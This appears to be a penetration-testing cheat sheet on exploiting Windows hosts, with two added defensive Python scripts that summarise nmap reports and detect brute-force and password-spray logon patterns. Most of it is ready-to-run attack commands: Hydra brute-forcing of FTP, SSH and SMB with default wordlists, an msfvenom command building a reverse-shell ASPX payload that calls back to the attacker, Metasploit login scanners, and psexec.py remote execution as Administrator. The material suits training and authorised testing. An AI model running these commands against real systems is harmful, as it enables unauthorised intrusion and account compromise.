# Windows Exploitation

## Port Scanning & Enumeration - Windows

* Conduct a common port scan

```bash
nmap -sV <ip>
```

* Perform a port scan on ports 1 to 10000 and save the XML output (`-oX`) to "nmap_10k" so it can be imported into Metasploit later.

```bash
nmap -T4 -PA -sC -sV -p 1-10000 <ip> -oX nmap_10k
```

* Perform a port scan on all ports and save the XML output to "nmap_all".

```bash
nmap -T4 -PA -sC -sV -p- <ip> -oX nmap_all
```

* Conduct a UDP port scan.

```bash
nmap -sU -sV -p- <ip>
```

* **`msfconsole`** commands:
  * **`workspace -a <workspace_name>`** – Create a new workspace.
  * **`workspace`** – Display the current workspace.
  * **`db_import <nmap_scan_file_path>`** – Import an Nmap scan report into the database.
  * **`hosts`** – List discovered hosts in the current workspace.
  * **`services`** – List services associated with discovered hosts.
  * **`auxiliary/scanner/smb/smb_version`** – Use Metasploit to scan for SMB version information.
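
The `-oX` reports above are plain XML, so they can be summarised without `msfconsole`. The following Python script is an added example, not code from the original notes: it parses an nmap XML report into a list of open services and flags the ones this page goes on to examine (FTP, SSH, SMB, MySQL) with the authentication check each deserves. The XML embedded in it is a constructed sample shaped like a trimmed `nmap -sV -oX` report, not real scan data; `REVIEW_SERVICES` is a hypothetical mapping you would adapt to your own environment.

```python
"""Summarise open services from an nmap XML (-oX) report.

Added example; the XML below is a constructed sample, not real scan output.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample of an nmap -oX report, trimmed to the elements parsed here.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX nmap_10k 10.0.0.5">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="Microsoft ftpd"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.1"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="open"/>
        <service name="mysql" product="MySQL" version="5.5.20-log"/>
      </port>
      <port protocol="tcp" portid="8585">
        <state state="closed"/>
        <service name="http"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Hypothetical review list: services the notes target, each with the
# authentication check a defender would want to run when it is exposed.
REVIEW_SERVICES = {
    "ftp": "check for anonymous login and weak credentials",
    "ssh": "check for password authentication and default accounts",
    "microsoft-ds": "SMB: check share permissions and account lockout policy",
    "netbios-ssn": "SMB: check share permissions and account lockout policy",
    "mysql": "check for remote root login and default passwords",
}


def parse_nmap_xml(xml_text):
    """Return one dict per open port: host, port, proto, service, product, version."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are skipped in the summary
            svc = port.find("service")
            records.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    return records


def services_to_review(records):
    """Pair each open service on the review list with the check it needs."""
    findings = []
    for rec in records:
        hint = REVIEW_SERVICES.get(rec["service"])
        if hint:
            findings.append((rec["host"], rec["port"], rec["service"], hint))
    return findings


if __name__ == "__main__":
    # Pass a real -oX file as the first argument; otherwise the sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            xml_text = fh.read()
    else:
        xml_text = SAMPLE_NMAP_XML
    recs = parse_nmap_xml(xml_text)
    for r in recs:
        line = f"{r['host']}:{r['port']}/{r['proto']} {r['service']} {r['product']} {r['version']}"
        print(line.rstrip())
    for host, port, service, hint in services_to_review(recs):
        print(f"REVIEW {host}:{port} ({service}): {hint}")
```

Run it as `python3 nmap_summary.py nmap_10k` against a real report; only `open` ports are listed, so the closed port 8585 in the sample does not appear.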

## Targeting Microsoft IIS FTP

```bash
nmap -sV -p 21 --script=ftp-anon <target-IP>
```

* Conduct an Nmap scan on port 21 with the "ftp-anon" script to check for anonymous FTP access.

{% code overflow="wrap" %}

```bash
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <ip> ftp
```

{% endcode %}

* Use Hydra to perform a brute-force attack using a list of Unix usernames and passwords against the FTP service on the specified target (Hydra requires the service name, here `ftp`, after the target).

{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=<our_IP> LPORT=<our_Port> -f asp > shell.aspx
```

{% endcode %}

* Generate a reverse shell payload in ASP format using msfvenom, with the specified listener IP and port, and save it to a file named "shell.aspx".

## Targeting OpenSSH

```bash
hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt <ip> ssh
```

* Use Hydra to perform a brute-force attack with the username "vagrant" and a list of Unix passwords against the SSH service on the specified target IP.

```bash
auxiliary/scanner/ssh/ssh_login
```

* Use this Metasploit auxiliary module to scan for SSH servers and attempt to log in using provided credentials or default ones.

## Targeting MySQL Database Server

```bash
nmap -sV -sC -p 3306,8585 <ip>
```

* Conduct an Nmap scan with version detection and default scripts on ports 3306 and 8585 of the specified IP.

```bash
auxiliary/scanner/mysql/mysql_login
```

* Use this Metasploit auxiliary module to scan for MySQL servers and attempt to log in using provided credentials or default ones.

```bash
mysql -u <user> -p <pass> -h <ip>
```

* Use the MySQL client to connect to the specified IP using the given username and password.

## Targeting SMB

{% code overflow="wrap" %}

```bash
hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip> smb
```

{% endcode %}

* Use Hydra to perform a brute-force attack with the username "administrator" and a list of Unix passwords against the SMB service on the specified IP.
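
The Hydra runs against FTP, SSH and SMB on this page all produce the same footprint on the target: bursts of failed logons from one source, either many attempts against one account or one attempt each against many accounts. The Python script below is an added example, not from the original notes, showing how a defender spots both patterns. Its input is a constructed list of failed-logon events modelled on the fields of Windows Security event ID 4625 (TimeCreated, IpAddress, TargetUserName, LogonType); the thresholds and window sizes are assumptions to tune per environment.

```python
"""Flag brute-force and password-spray patterns in failed-logon events.

Added example. SAMPLE_4625 is a constructed dataset modelled on event ID 4625
fields; it is not real log data from any host.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source hammering "administrator", one source
# trying many accounts once each, and a single typo at a console.
SAMPLE_4625 = [
    # (TimeCreated, IpAddress, TargetUserName, LogonType; 3 = network, e.g. SMB)
    ("2024-03-01T10:00:01", "10.0.0.9", "administrator", 3),
    ("2024-03-01T10:00:02", "10.0.0.9", "administrator", 3),
    ("2024-03-01T10:00:02", "10.0.0.9", "administrator", 3),
    ("2024-03-01T10:00:03", "10.0.0.9", "administrator", 3),
    ("2024-03-01T10:00:04", "10.0.0.9", "administrator", 3),
    ("2024-03-01T10:00:05", "10.0.0.9", "administrator", 3),
    ("2024-03-01T10:05:00", "10.0.0.23", "alice", 3),
    ("2024-03-01T10:05:01", "10.0.0.23", "bob", 3),
    ("2024-03-01T10:05:02", "10.0.0.23", "carol", 3),
    ("2024-03-01T10:05:03", "10.0.0.23", "dave", 3),
    ("2024-03-01T10:05:04", "10.0.0.23", "erin", 3),
    ("2024-03-01T11:30:00", "10.0.0.50", "alice", 2),  # interactive logon, one failure
]


def parse_events(rows):
    """Convert raw rows into (datetime, ip, user, logon_type) tuples, user lower-cased."""
    return [(datetime.fromisoformat(ts), ip, user.lower(), lt) for ts, ip, user, lt in rows]


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: peak_failures} for sources with >= threshold failures in any window."""
    alerts = {}
    per_ip = defaultdict(list)  # sliding window of timestamps per source
    for t, ip, _user, _lt in sorted(events):
        q = per_ip[ip]
        q.append(t)
        while q and t - q[0] > window:
            q.pop(0)  # drop failures that fell out of the window
        if len(q) >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), len(q))
    return alerts


def detect_spray(events, min_users=4, window=timedelta(minutes=5)):
    """Return {ip: peak_distinct_users} for sources failing against many accounts."""
    alerts = {}
    per_ip = defaultdict(list)  # sliding window of (timestamp, user) per source
    for t, ip, user, _lt in sorted(events):
        q = per_ip[ip]
        q.append((t, user))
        while q and t - q[0][0] > window:
            q.pop(0)
        distinct = {u for _, u in q}
        if len(distinct) >= min_users:
            alerts[ip] = max(alerts.get(ip, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    ev = parse_events(SAMPLE_4625)
    for ip, n in detect_bruteforce(ev).items():
        print(f"BRUTE-FORCE  {ip}: {n} failures within 60s")
    for ip, n in detect_spray(ev).items():
        print(f"PASSWORD SPRAY {ip}: {n} distinct accounts within 5m")
```

A spray also trips the plain failure counter once it crosses the threshold, which is why `10.0.0.23` appears in both lists; the spray detector is the one that tells you the source is cycling accounts rather than guessing one password list against one user. An account lockout policy blunts the first pattern but not the second, so both checks belong in the same rule set.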

```bash
smbclient -L <ip> -U <user-Name>
```

* Use smbclient to list shares on the target IP, providing a username.

```bash
smbmap -u <user_name> -p <pass> -H <ip>
```

* Utilize smbmap to enumerate shares on the target IP, providing a username and password.

```bash
enum4linux -u <user-name> -p <password> -U <ip>
```

* Run enum4linux to gather information from the target IP using specified credentials.

```bash
auxiliary/scanner/smb/smb_enumusers
```

* Use this Metasploit auxiliary module to enumerate user accounts on an SMB server.

```bash
python3 psexec.py Administrator@<ip>
```

* Run the psexec.py script to attempt remote command execution as the Administrator user on the specified IP.
* Review the discovered services and their versions to decide what to investigate next.

***


**`Hacker's Mantra:`** `The hacker didn’t succeed through sophistication. Rather he poked at obvious places, trying to enter through unlocked doors. Persistence, not wizardry, let him through. - Clifford Stoll`
